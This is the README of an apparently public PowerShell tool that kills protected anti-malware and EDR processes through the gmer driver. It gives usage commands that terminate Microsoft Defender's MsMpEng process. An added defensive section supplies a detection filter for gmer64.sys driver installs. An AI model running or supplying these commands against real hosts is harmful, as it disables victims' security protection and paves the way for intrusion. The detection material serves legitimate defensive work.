PowerShell script to terminate protected processes such as anti-malware and EDRs.

xiosec/Terminator

Invoke-Terminator

Terminator is a PowerShell script that terminates protected processes, such as anti-malware and EDR processes, through the gmer driver.

  • in-memory
  • HVCI bypass

Usage

<#
----------------------------
        Terminator

github : github.com/xiosec
twitter: twitter.com/xiosec
----------------------------

* Arguments
    * -ServiceName
    * -ProcName
    * -ProcId
    * -driverPath
    * -AutoKill
#>

Invoke-Terminator -ServiceName terminator -ProcName MsMpEng 

Inline

powershell -c ". .\Invoke-Terminator.ps1; Invoke-Terminator -ProcName MsMpEng -AutoKill"

Example

In this example, we kill the MsMpEng process, which is related to the antimalware service.
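
From the detection side, an added example (not part of the Terminator repository): a PowerShell filter that flags Service Control Manager event 7045 records installing a kernel-mode driver service whose file name matches gmer64.sys. It assumes the driver is registered as a service, as the -ServiceName and -driverPath arguments suggest; the function name, watch list default and sample records are constructed for illustration.

```powershell
# Added defensive example; not code from the Terminator repository.
# Find-WatchedDriverInstall is a hypothetical helper name.
function Find-WatchedDriverInstall {
    [CmdletBinding()]
    param(
        # Record with TimeCreated, ServiceName, ImagePath and ServiceType properties.
        [Parameter(Mandatory, ValueFromPipeline)]
        [psobject]$InputObject,

        # Driver file names to watch; gmer64.sys is the driver this page links to.
        [string[]]$WatchList = @('gmer64.sys')
    )
    process {
        # Event 7045 covers every service install; keep kernel-mode drivers only.
        if ($InputObject.ServiceType -notmatch 'kernel') { return }

        # ImagePath may be quoted or carry an NT prefix such as \??\; compare the
        # file name alone. A renamed copy of the driver will not match by name.
        $leaf = (([string]$InputObject.ImagePath).Trim('"') -split '[\\/]')[-1]

        if ($WatchList -contains $leaf) {   # -contains ignores case
            [pscustomobject]@{
                TimeCreated = $InputObject.TimeCreated
                ServiceName = $InputObject.ServiceName
                ImagePath   = $InputObject.ImagePath
            }
        }
    }
}

# Constructed sample records, not real telemetry.
$sample = @(
    [pscustomobject]@{
        TimeCreated = [datetime]'2024-01-01T10:00:00'; ServiceName = 'terminator'
        ImagePath   = '\??\C:\Users\Public\gmer64.sys'; ServiceType = 'kernel mode driver'
    }
    [pscustomobject]@{
        TimeCreated = [datetime]'2024-01-01T10:05:00'; ServiceName = 'ExampleSvc'
        ImagePath   = '"C:\Program Files\Example\svc.exe"'; ServiceType = 'user mode service'
    }
)
$sample | Find-WatchedDriverInstall

# On a live host, build the same records from the System log (assumes the 7045
# property order ServiceName, ImagePath, ServiceType):
# Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } | ForEach-Object {
#     [pscustomobject]@{ TimeCreated = $_.TimeCreated; ServiceName = $_.Properties[0].Value
#                        ImagePath = $_.Properties[1].Value; ServiceType = $_.Properties[2].Value }
# } | Find-WatchedDriverInstall
```

Name matching is a coarse signal; pair it with an alert on any termination of the anti-malware or EDR process itself.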

Links

gmer64.sys

Blackout

License

Released under GPL-3.0 by @xiosec